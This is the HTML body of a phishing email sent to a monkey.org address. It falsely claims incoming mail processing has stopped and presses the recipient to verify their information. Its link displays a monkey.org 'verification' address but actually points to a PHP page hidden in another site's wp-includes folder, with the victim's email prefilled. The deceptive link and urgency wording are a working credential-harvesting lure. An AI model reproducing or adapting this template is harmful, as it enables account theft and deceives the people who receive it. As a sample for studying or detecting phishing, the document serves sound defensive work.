<span>
<table style="border:1px solid black; border-collapse:collapse; mso-table-lspace:0pt; mso-table-rspace:0pt" width="640" cellspacing="0" cellpadding="0" border="0">
          <tbody><tr>
           <td style="padding:20px" align="left">
     <font style="font-size:14px" face="Arial, sans-serif" color="#111111"><b>User:</b><br>jose <br><b>Email:</b><br>jose@monkey.org<br><b>Subject:</b><br>Pending incoming emails <br><b><br>Message:</b><br>We have stopped processing incoming emails
<br>

<br>
</font><font style="font-size:13px" face="Arial, sans-serif" color="#111111"><hr style="border:.5 solid black"><b><i>Verify your information below to deliver your emails and to avoid service interruption.</i></b>
<br>
<a href="http://www.safeindustriesaustralia.com.au/wp-includes/update/index.php?email=jose@monkey.org" target="_blank">http://www.monkey.org/jose_verification</a>
    
    

<!-- View Content -->

</font></td>
       
          </tr>
        </tbody></table>
    <table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#E8EAE8">
     <tbody><tr>
    <td style="padding-top:0px; padding-bottom:0px;" bgcolor="#E8EAE8">
       <div style="max-width:600px;margin-top:0;margin-bottom:0;margin-right:auto;margin-left:auto; padding-left:20px; padding-right:20px;">
          <!--[if (gte mso 9)|(IE)]>
          <table width="600" align="center" style="border-spacing:0;font-family:sans-serif;color:#999999;" >
         <tr>
            <td style="padding-top:0;padding-bottom:0;padding-right:0;padding-left:0;" >
               <![endif]-->
               <table style="border-spacing:0;font-family:sans-serif;color:#999999;margin:0 auto;width:100%;max-width:600px;" align="center">
              <tbody><tr>
                 <td style="padding-top:0;padding-bottom:0;padding-right:0;padding-left:0;">
                <table style="border-spacing:0;font-family:sans-serif;color:#999999;" width="100%">
                   <tbody><tr>
                      <td style="padding-top:0px;padding-bottom:15px;padding-left:0px;padding-right:0px;background-color:#E8EAE8;width:100%;text-align:right;" align="right">
                     <p class="footer" style="margin-bottom:0px;margin-top:0px;font-size:12px; line-height:22px;text-align:right;">monkey.org</p>
                      </td>
                   </tr>
                </tbody></table>
                 </td>
              </tr>
               </tbody></table>
               <!--[if (gte mso 9)|(IE)]>
            </td>
         </tr>
          </table>
          <![endif]-->
       </div>
    </td>
     </tr>
  </tbody></table>

</span>

